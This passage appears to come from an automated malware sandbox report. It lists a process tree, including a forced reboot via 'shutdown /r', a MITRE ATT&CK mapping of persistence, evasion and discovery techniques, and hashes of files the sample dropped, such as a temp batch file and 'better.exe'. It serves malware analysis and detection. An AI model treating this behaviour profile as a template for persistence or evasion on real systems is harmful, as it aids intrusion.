      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1904,3782535824194974709,10684943795347908891,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3728
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c shutdown /r
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2296
- - C:\Windows\SysWOW64\shutdown.exe
    shutdown /r
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:2384

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1156

C:\Windows\System32\PickerHost.exe
C:\Windows\System32\PickerHost.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:3628

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
1⤵
PID:2160

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3989855 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:2820

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding
1⤵
PID:2960

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Account Manipulation

T1098

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Account Manipulation

T1098

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Indicator Removal

T1070

Network Share Connection Removal

T1070.005

Modify Registry

T1112

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Discovery

Browser Information Discovery

T1217

Permission Groups Discovery

T1069

Local Groups

T1069.001

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
aad1d98ca9748cc4c31aa3b5abfe0fed

SHA1
32e8d4d9447b13bc00ec3eb15a88c55c29489495

SHA256
2a07cac05ffcf140a9ad32e58ef51b32ecccf1e3ab5ef4e656770df813a8944e

SHA512
150ebf7e37d20f88b21ab7ea0793afe1d40b00611ed36f0cf1ac1371b656d26f11b08a84dbb958891c79776fae04c9c616e45e2e211d292988a5709857a3bf72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
852b3c86a6d00a8d3060b0e512794602

SHA1
587d453d6f65cc18b93d7a337aa8469194cba20a

SHA256
4c284c3b63994d4c70b60f8aee3eb6a30299524a3069fd7a33b163bdef47d8b7

SHA512
5714749c9a80abcda6b4afdc2edd387d486d0011799e19f597a8a40be98cb2af405eecd0d38a39954f772b68508642c3ea51cd97e50222d3d78b68652783d683

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
2ad92cd4f23cb4c9aca348dea2ec6363

SHA1
7ffe3bc242a16d616668c46531ba45b9b8409cdd

SHA256
b4f9094535a0d97ad33d2a82dc9495a90f80f49a8ffc21f579e1713736b73529

SHA512
6d2b711739bfab13daeebac060d6c9b202d572ce2c8901092e6967ced1cac97111d040472db81b30d86fe8279a4433240b6393a832e5bf67a73619fd41187312

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
cb557349d7af9d6754aed39b4ace5bee

SHA1
04de2ac30defbb36508a41872ddb475effe2d793

SHA256
cfc24ed7d1c2e2c6585f53db7b39aa2447bf9212487b0a3c8c2a7d8e7e5572ee

SHA512
f0cf51f42d975d720d613d09f201435bf98c6283ae5bc033207f4ada93b15e49743a235a1cfb1b761bde268e2f7f8561aa57619b99bff67a36820bc1a4d0ec4a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0

Filesize
44KB

MD5
ece9f865b789c665b7495e83fcf566c6

SHA1
1f2c39f0059da3c0f1e3571263ac3dab3c57a702

SHA256
6c4695c70472971d8354791fa46d5df4b096729b285ba535c8ca0cc665adad23

SHA512
daef62c3d55413574e89794de079871ac22c2bdd9775086a0dbb91173e71bc687bc62dcaaf88b3b7e7d63065e8ead12d0586e7ea50b5e317578cea4c1ab338f1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1

Filesize
264KB

MD5
4c8eb2398c44b760f0fe3ede4ae7efe2

SHA1
448162675b4b1ce8620fbc570e1720e70151f699

SHA256
d5e4b3b992d1516c077eff7932c606af3170f47e50a3c3d3c897b2b6b81efc58

SHA512
697a216384bc3909554ead236342a18176da9781ea552486f60db47e777c3554e7f62c6c5b3e56dad76673167e77941295352d520eda04ad066dbb624ea33de0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
2b9d1cd2f99e3d1b8d283a048f3a3651

SHA1
6d3ee41b5a84b39b34713d06b54b308a6bcd5be1

SHA256
ccddeff66c0f2236557b05df25d1096ec6673b8f0c2a6e5309301f1759291a11

SHA512
36534adc493a0e8d0b676b2b9800429f5fd7029e387f5b3087f4fa8c6e74d485a8defe53d4d059634560ad25fa44fbcff029dac373c3d9f0274c56989fc0b07a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
144B

MD5
1274b9faf213edcd8ab6dab647db248e

SHA1
1608fec06ffedbf02ded88421f960e66df699487

SHA256
3dcd80c6ad9db891656250d551263ddd7cf6195255a4646a0343ffcf2f027d27

SHA512
a8c1060c99d0d93c29144a194d0f555f306d5deb43f7833f23dfc9fce397e9f05bfbda118b98bbb70d0d49b10b2b232fbb8e8aca88f7edb743578d0c77f29128

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies

Filesize
20KB

MD5
6889f205eb58ab9bf34cbeea02727b1b

SHA1
da4a71db8d06175072c38a806e8c778ff801e69c

SHA256
64c5d74b501bb91f38f0cfbe63fbfb40e8d2b991383587e91f39f003c05cb9c9

SHA512
8fd0a96387076265e9cec0d2cb4f108d82a1e5800718e52fdb5bb66417d7ce86ed695f2e2d6627f5ec80e31429264f0446acfa26f69c63de11af340c22e64c38

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Favicons

Filesize
20KB

MD5
b7cb9d73cb5d68dd2fc93be51fde6e99

SHA1
2ad4d2b982daa908fe495846c8203d3ef210365b

SHA256
40330131a4266b78c5b309035662046470a548ed12b4ab815610903feb6279d2

SHA512
a31a0ed4e2a1b7f83a2d5cd97e9d37fdf1c580e9bb1da6485b3c4262e055eaf1495149df508ab2b9d5853b09824b0ad30ed7911b7c34f7584a2d1e0b346dcd7a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1

Filesize
264KB

MD5
20a25ffa89e4eee3271cd4217e1ea53c

SHA1
78d0f09bf065026fe90464fa7c927441efd2e026

SHA256
22c6dcfe1290a5e0bf8c5ad786bd3247815b33096df18ea8ba47b754a49161ea

SHA512
b28c527d74a3f340ba23988eaf5d664a030d007703469881deb44f522eb5b4cdb18a08c03c72cd7f38a62749448022639b381b7b9fe5ee4d978e7013548e3e66

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1

Filesize
264KB

MD5
7d5f5a0b32ac7d7ec3bf2e426f870716

SHA1
332e11122b31b9e7652c3de02e62d0dba2d9d61a

SHA256
ec4cf4c12833841f6794362ed18eaa9bd637bc3d21e9bfacceec813fa7636cf5

SHA512
ca452ac31670f72fb388b81b2fe733d7175989ee957f1b0c0bae72c3961d3978bafbd18a3c2917ca5de588d289c9f899129a54eb7141f3d22059e12a990de98b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

Filesize
116KB

MD5
a271c261eafb447c62be4f07de52c91a

SHA1
632edac10ba3ea65caeb8b76b8915022997d2450

SHA256
c0cb5b4678e7839883c3b675a5b334c7227eedb018a3bb9cd799cbd08a04955c

SHA512
a7cbf866dab6c95538bffd7b813e156e4e9a102ef1477870188065bad527216be9c251833e8372d8b86ec5b4d001372e153b8f5cc31a281e485fbdbce9138466

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History Provider Cache

Filesize
612B

MD5
801d4f4790a42d90058fb5145f275539

SHA1
38b4fe4428a33befd50edeb2151218898a957cd9

SHA256
1d875d2ea4abab68bc570fcdf1cdccf1033c43d67b53847b0d53b8a2d395e686

SHA512
b1f1c490bc25ad14d1e35014f4ce961e0a20d5de74bb1328a8dbd4b2d54b2fcbac587673ccdfd5dc8d383cc6cfdc1f92ba952a482299bfe09544010b981011fa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

Filesize
1KB

MD5
869880ee6a9f0ac5ae3f5d5ecbf02a6f

SHA1
c1d1fe46403dd554c11620e87dd957a8d7bafedc

SHA256
b45bc5a105f1adba62095b7d5648b2650e43eb5ad298e5a55c7483cc2f406c31

SHA512
ea04253912148e0f5bb8ee77f3fbf396bd2c3f4451546f7b05ec0cb4273ffcb768978bfc3e22a7be8e3da94ff4975e5fefeb083667237559c7dd04574810dc80

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

Filesize
331B

MD5
90e0c8e6e9a662761e8bd440ffe0e96c

SHA1
be4bd0d0a9abba4500d08251f6b937686ed994bd

SHA256
a1afd36012ba3e7b1cf2363206d754a0c2dd80cf6e4de3f2242c5504bfdd5205

SHA512
d79d9d56ca598c3070889e7ab8c9b28f211d524e8125235eb7aa0414f235a5832c912ee711ecdd1ed71f863afa4c995dd3aee719535d079446d377c930e0cb30

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
2KB

MD5
e75be605d1b9bae25824283b927d1f23

SHA1
74e57ccf5e8f1718355cfda2340ea78adcd69cc6

SHA256
c4765654bf3246d8cb8afe3b6b708651f07a7ec237253010d7cfb50fbdab3910

SHA512
adb1e1b4530b7a110364c0a6b017d8e979a0d8d276e2c93cdb505b1860a4f476ed646be7e125a63dc4aea05f21060b02f871be86e27545a991ef756d4654023d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
2KB

MD5
7d8e61476e80f9329bf24ef3e156af1b

SHA1
c93e0ebb2c719b240fdc27409c3bf40af128697b

SHA256
921805a0c114f355c267173f0ba929e79d478d37b284a0c11eb31c15331edfba

SHA512
9e607b84ea71acfeae644dc81bb090943c1296a71d9bdcf5d6462f01757ae72ff1cbcb8d3610726ecfbd6622dfc62d8862eb2aaced19ff3dae198d7bd8a4e935

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
931B

MD5
38a44b5d69910cd0aef17d55920cb4c7

SHA1
2b2dd5d5c13ac6cc2a1adb6a55e04fc5ed42b50c

SHA256
cf1c4b9e3e2ec1cfe4b9d4344874e285b914ed1ea3e8e841056bf8d4ea723f15

SHA512
30e49a4763bbd53aef0816bbe82ae631b0fe49ef23c725c5169f7c3c4dbc5bd991cf3abfc3532e43b111ef720ed2062d2ae1cee913970ae4c911bb6d2f4d0269

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
35a943a4c8c412ef3f69701c0ab053c7

SHA1
7abc2239cc24b0cc751e2fdd86f94278631bf468

SHA256
337e66ff4fb3268f479f29be61930778218e32c4d2753a8e2862f236468cbbee

SHA512
79dbd63e51bdc2db114a7a97169c9c23e6c53ab11f252fbdbbbb6bcf73f54f646641f7a66ebf28d37874c3434571eee299fafed301c8cd9b2b5127836bbc0118

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
7062f1bcb86ed49b35b66661cb6ce175

SHA1
c839158d250cef42337f633f8e23934077c6cdb7

SHA256
17249d6dd4fc451ae37d8718ecfce4bcdfec97c8df33cd5f9af39cf2e6f1ad74

SHA512
53f1341ee14dcabccf2f946d2281fd41f799ca2c1b4a1fbb2ef01a0b9f47f649f57e03398ef3b8b317d525860de3802848cf0649e8e05b9ba9332995f8901a7f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
d9e171f40279a5231da1034666da0360

SHA1
8a9b4be3b82a220af5dacf4fdd2a4a9a25fdde35

SHA256
58fcbdadedba4bfb1e8e114b9d4a8fffd6d5c6e78d4ce97a79644041f4d69172

SHA512
5582e59cc6f445a0c38015a0ba6d569cdf7cbda38ea66970f2db5da54a62b33f7a06c3f8ec5c73c7c27e23fe513161961965cb66a20c49da74cb6a11add7d13a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
5424c508c7d5748b75f3ee16ded8c40e

SHA1
521fcdfa14baabcadb246129f7015f855b12db61

SHA256
aca310ca92bcbbe37832af09ec49ef4844e3bcd240b6baa8811a0408dcc1d830

SHA512
80e198bf4426f59a335c2557592fe85c4a125163b3e9ef8442c91c9618c6e49fd27deb0d0fab75400e5f7e2ed30e4ccd89baa7467109febc016d3b1528d805d7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
54245c85c52ef2c9b0d054451a00831e

SHA1
b100398016b5a7a95c6239ebaff10a42b5824320

SHA256
8ffb051d838c1ac825fa86c25d06a9d4f5ca8d213afd4576a969fb2af7eb1536

SHA512
557db28a4f3ea47be7933e3e348f583a099142c1e59e42ec5d4f5c780ad18e34baeb32c795467fbb271cd92f8a570080128787f81eb6e908ca938d20dea5234f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
45e22bbb0e569598f221ad1980035288

SHA1
079f8c382db836a6c1caa7d113569da843d7e105

SHA256
2df6155ffaa4e1b0578877edbb7238ca20c954c9acd40e0069c27151fe28da9b

SHA512
fe7ef98c47f69271f5a2f360f173ab15b43e76b1207b7d5c373d5e8099725f2982feb41011dbb09268520658fd31fa1b0f29fda82c41700fb48d9e6151ae46bd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
3f7a368727eef2e94dafa807a6332504

SHA1
59c2dd7dc2a1915f45c6e9078b850b750d546c2e

SHA256
791715c1a2e0197603f2886880cee73cc5b24cd8f81946b776f2fc3cb535ef9d

SHA512
496b4e401a6524a6d2a4527b12abd014688ca4d8a3e69f98771909578d210ec2118fdc9266d120b5da81ba2c06a4a3ab4bd6620a3921a138452dd00e9a80193c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

Filesize
345B

MD5
f9a40e88d8bfe49a08d6e4cb2ed62d1b

SHA1
93fe7adb045240d80c52525ab754704447a5c3ed

SHA256
16fa209d5aaba9824d22b771a63a3dbbb5c62aa1172b79e12ac7aea88855e972

SHA512
351507f069a44cb45720d7aa306177b61b6b910683d9414d1c79e61157591147393909e6432f61fd8de0e9aa74aba74639b6df770293eca6d844220e2939316c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

Filesize
319B

MD5
cdc5a11db7511cafa4307e38607541cd

SHA1
23e50e5eae9b1e54258e2321fdcaec7c213ace76

SHA256
afcd77b0ade3e9bb1675638544690069cdf6ef48ba26bca25af46602f7248fdf

SHA512
c489d94e9b3908f2181dbcec830800cbcc853da02259e09ec585cf4d0b872ed9afd5f9f40da798bda453f8ad474546bd47e6827712fd55a779cf8daeb017df60

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Tabs_13379621166215713

Filesize
2KB

MD5
d16974bcd514af85e2520129c1886fc5

SHA1
41663a145228f849478ed94b13eb0cbbab1d65c4

SHA256
c8477058d50f25eda7ee8c3a65707185ca2ddd620e55e982cc791effb260915d

SHA512
2ed6725eaf935a4faf769c799438536941fa1f9c3559d202de5b81fbbd40ef9b199ec2cf47ae2ec36df8f1ee89c503f7d764aeb94275db0ea30a70e3a4f67151

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\000003.log

Filesize
112B

MD5
a66cd36c7cf15ea8d493edf012350341

SHA1
2b641b5c195394eac0127de777dd40bec498f4ea

SHA256
084d3026f7e17e5ce3d8844b0036e9f83f27e02ae457b8c62a3136849a7dd3a7

SHA512
85a54901200d88896e687fec9080cd411ba5335b24bd3f6aad687f2290f2ded104b10bdc0dc421d47fc9104359e7a236cb47e0d0f49a065bd9ed04593426da3f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

Filesize
347B

MD5
3f74fc2f2b32c650d9f121e7315bd999

SHA1
9c20c8873a112e71eeede027d496b43d2bda91d2

SHA256
45ae066023ea43a893df4201c237e852353577edd4e301452e46f04cd9bca98c

SHA512
d315629479386ce239478a09c69c4cc15c389a98639a9f76f128d4ef383c0cacb7de33576b9a3bcb63705898406735af475c5f5d215622f8776d728cb814dff2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

Filesize
320B

MD5
6d8f403a498e7a8cea6cf12bc2d56476

SHA1
b786b572fc7630781b46e423d8209d170e0fe4dc

SHA256
2316c2c11674783bff75488ca50ecc382bfb39289fbeaa19f1ae1847f6809b09

SHA512
b871ac4415bf0d8e52f65df828a7e15d156b55f316dd0b09d85f2ed8d500db75b337209ac18a4b65e76c7c0a0eb65b20cea1abd3da652af93433e0adee2d15c6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
2eba7460fa7e1c07846663e4f41cdb48

SHA1
2599d1ca48850fdced292e940a4b61e027575b95

SHA256
f29034beac5010dd0d9250f8b1fae948689b1343c2075ac577d339dcba58b437

SHA512
a90cb2836279808d80e77d036a67fc100c5f9b866f5dbff59789db8a8440940b4957be9b6bfe07fc805d8f9f1f4aaea1a17a894e6023d345e3a117bab846984a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
64f68901baf3a75fd1dac8a02e4ce1bb

SHA1
3d4a9c002cce3b1f4504843763226d01aa7f8b6f

SHA256
ba874136b976c68fa2c6165df21ea2c197f0861ca55eafaa8296a7544ea8d60a

SHA512
565e83e319541ba92b2c9a5b2a3e8525db703c3c4ac36ccaefcc0547615e7595dea90cd8d2689b852b5c369c0e952e4054ea395d36e16077a9b75825c9cd832d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
afca6d6b78dd92b7dcd852c538656148

SHA1
2dded77231025827a5bdfc1c0ce4e5006c01f621

SHA256
34a8ce690ffd8d69f46d3872185ceadec6d9b4daa82aa1f436dc98ae2dd232c1

SHA512
dce1bc31f53be71547461237308255febcd04c86746b23ff5081076233406f44e00c664fb1c6880477b7c1241c5cc842b683217dcdaab43452b065cfd98eb75b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
9e8459caa7db64996f48ca0261e8ab3a

SHA1
a2d12a2fca8b9f3522ed4d2161deba474223d8f3

SHA256
d30f712e78329ec6e56db3f2a2c052370145bfad031812380140fc04e33ed214

SHA512
ee2150e7512d5907c205dd83ab05d43f8b2833a2c2cfc63385cdf3f39210f8fd81f5c3e4e32d19d652cb41bafd0cc841fdbf591428174981208477bf5dbaf00c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links

Filesize
128KB

MD5
26a42c65a8d38bb5d239bb8f53b8d002

SHA1
8a32e7f11ff76346ae1255d2daccf8375bf6057f

SHA256
564147d3d8fa3b77342f20b2705f3399b0be57fd7841ebf087e40e2190f58a75

SHA512
27d9fa0f7311dac715fdb8bdd5bf7527c7343e303f01c6a82e5d15af811e6946c735a43c1827a955f3f518637c46f4cda5877a775db53994e62ef46116ed8a63

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
aefd77f47fb84fae5ea194496b44c67a

SHA1
dcfbb6a5b8d05662c4858664f81693bb7f803b82

SHA256
4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611

SHA512
b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db

Filesize
44KB

MD5
009573b945961e34fb7c56e213ee199d

SHA1
f1d330256df2fc251b110f3f86b5d0618922a073

SHA256
b10cdc34c9a134b09f57d62990a5099dec615959b423241a961870e8b3c6f0e8

SHA512
425a30bf866036cc904988ea878a3b9a02f4b81a530063e55b34281a799e691e56cb996b12ab693008160080d027e7f549e5ea7bda42e83f26067b54eba277e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

Filesize
24KB

MD5
fc4b223db1ad79cdb1ce2774507a055a

SHA1
66ca64dcecba9a9651ca00c1603c429d8a6ad32c

SHA256
4347bca434fadfdc7146f9d805f417e2dc2e921ca105cbf1a448530e6f61fc57

SHA512
1c63d14362a9f87d042eb5a725f7bdfa9ff442df702716016039cb4dabc2b94c1cc2ebc6581a0ad18b0745c2c01263405f0ddcfd60ac2eb9a7c3232713967dc1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

Filesize
319B

MD5
1e978faaf75d6e07946395894f7b141a

SHA1
3e0870012462cd6526c47082e8d701f5a3933665

SHA256
f71a3ca7fa7a0984f2a0f964d56621f1594a7dbb5852e06818a421de8e96baca

SHA512
6677d7708000667671908c719662542018e3024164bda6906d4973288ade64ceb0976b7db03c89aeaf660a50b98172e4d87ca630764a51b6ca9cd08e3c9a592b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

Filesize
337B

MD5
062d820011241a0955b7f2c2a1529625

SHA1
ea5cd90b02180ad6ef04baaaea243bc937efa054

SHA256
cc51ff8b2fe7bb2c9d6282767ddd16f76305df131a4f28c9921229b327d1d2a3

SHA512
7b94493cfa3920b8fa3fb485d053aa1473ed814c60fcbc7299798f9dac540fa941def13117898a250cf476fa3a32f43e74a9df21320b24800c8f3cc3b029b301

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version

Filesize
11B

MD5
b29bcf9cd0e55f93000b4bb265a9810b

SHA1
e662b8c98bd5eced29495dbe2a8f1930e3f714b8

SHA256
f53ab2877a33ef4dbde62f23f0cbfb572924a80a3921f47fc080d680107064b4

SHA512
e15f515e4177d38d6bb83a939a0a8f901ce64dffe45e635063161497d527fbddaf2b1261195fde90b72b4c3e64ac0a0500003faceffcc749471733c9e83eb011

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
fb76bff846ba945f4f6a7abcfc72437a

SHA1
b0c150ed52817dbec0e83460a69ca98fb810c033

SHA256
1ae11e52d479f9c27c0e43033b7f71e6276cf9375ca8d9e2bb8b41b74a928870

SHA512
5948c66f2848d8aee53505feea055dd229c9e399ab68570ec3e81194af3034460dbdde1ef25d48c26e9daca51af99c5b3b54d4c67fb95e463654bd8e771152e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
fc2ba538b9eb498f88a8dcb7d26db254

SHA1
4e1995797e6e66c76b5c3e6411865fe9207dc623

SHA256
4620174ba98f69098fe6115327f06ee7ed192344d2439860597986bd225d7d77

SHA512
f5c36badedf7dbd9ac9a609dcb1bf23167e4597e71610e281438a9d2e105656200d77510faefd6e55fd1986dbd14cd77607c478a68893d161e3fb19cbf18d8bb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
97592ac0148092cf9337def8e1605f15

SHA1
4c758180588b6463cf73512ebb226c2f6bb88892

SHA256
f09ecfb773282050a31ecc5ce00bc4a1ced4af13e538e81446497e11a82885ab

SHA512
e7ed580b5b670a2094e9c10c287fb15a221cadac00447945847293c728690e3cddf3195aa4d738d09f9e909400ab15f3e392706b57877ad4aca0c64981791d68

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
c8dda2d36271a759672a7a141d7ce898

SHA1
1596cdbe6ea56dbb0bf4a62f2809f5ebe178588d

SHA256
9cc2e12abc69ea652215f7235f54111cdc8e7aa4652d724ab49611c6131316f3

SHA512
fa78f926bd0ae3c9f712be8aa9050c6c754b2234fe81f1a32f613298c625aabce96aeee67089ba0cca452dbaae7c363d359322dc5846b10f9485d7b92014fa6b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

Filesize
264KB

MD5
aaa526148d0ba16bd0d25fd2449fdffe

SHA1
1ad7efa08118bd31da548afdf01327ccfb7b7ac3

SHA256
5fbdf007916c0b9d33a0b10d4b070713b2c9206d4cc3a1917fe7e1afbb319b70

SHA512
e732714b34f55e9a3578a1108b178b8c1e26f47a9edfc3e2e514efd31e13df869d16b9c937d3d9f0de57f13468d25afbf3466e2f5acb0ea7ed4a450a6845b9eb

Download Submit
C:\Users\Admin\AppData\Local\Temp\KF5uPsUneLtW.bat

Filesize
196B

MD5
f73c08bb4d02e9fdc8cc959cacd85564

SHA1
5764dc4f4a3050b1d986dcfd6890a1396ddf403e

SHA256
7d796404a74669c5908bf65d57ee4bf2cf0701de7d1ab15f330c73d1b7112898

SHA512
b6ad3611fb86e7aeea287c55602b6b5d63cf6a9ccd59426658ec0d3964e156c8c1dbf1ebd582b9a69fa0c0d049daef95e942d4ee6f242b26b0b11d90f648f53c

Download Submit
C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\better.exe

Filesize
3.1MB

MD5
47ec64e3d129b23c44f417cbc2a07aa7

SHA1
e65fbcf69e6e808ebe7bc9b13e483c5fc80d5fa2

SHA256
ccb17adb4b57a95a61acb010c01da98dc150be67a85df2ab40ba9d1f078f8373

SHA512
52247a235b708e98efcf977fd109344e16df9c5a9f13ad5afd395df3f009d9ee6edf81fef9d74a31a9fdec1f851e61642912eb9bc8384b39042b70f9d8b7d510

Download Submit
C:\Users\Admin\Downloads\Lose2himato.exe:Zone.Identifier

Filesize
26B

MD5
fbccf14d504b7b2dbcb5a5bda75bd93b

SHA1
d59fc84cdd5217c6cf74785703655f78da6b582b

SHA256
eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

SHA512
aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

Download Submit
memory/1432-238-0x00000000071B0000-0x0000000007B35000-memory.dmp

Filesize
9.5MB

Download
memory/1432-265-0x0000000006CC0000-0x0000000006CFA000-memory.dmp

Filesize
232KB

Download
memory/1432-235-0x00000000071B0000-0x0000000007B35000-memory.dmp

Filesize
9.5MB

Download
memory/1432-240-0x0000000008DA0000-0x0000000009988000-memory.dmp

Filesize
11.9MB

Download
memory/1432-286-0x00000000099F0000-0x0000000009A18000-memory.dmp

Filesize
160KB

Download
memory/1432-283-0x00000000099F0000-0x0000000009A18000-memory.dmp

Filesize
160KB

Download
memory/1432-281-0x00000000099C0000-0x00000000099E3000-memory.dmp

Filesize
140KB

Download
memory/1432-278-0x00000000099C0000-0x00000000099E3000-memory.dmp

Filesize
140KB

Download
memory/1432-250-0x0000000006C30000-0x0000000006C36000-memory.dmp

Filesize
24KB

Download
memory/1432-253-0x0000000006C30000-0x0000000006C36000-memory.dmp

Filesize
24KB

Download
memory/1432-254-0x0000000006C20000-0x0000000006C2C000-memory.dmp

Filesize
48KB

Download
memory/1432-258-0x0000000006D00000-0x0000000006DB4000-memory.dmp

Filesize
720KB

Download
memory/1432-262-0x0000000006CC0000-0x0000000006CFA000-memory.dmp

Filesize
232KB

Download
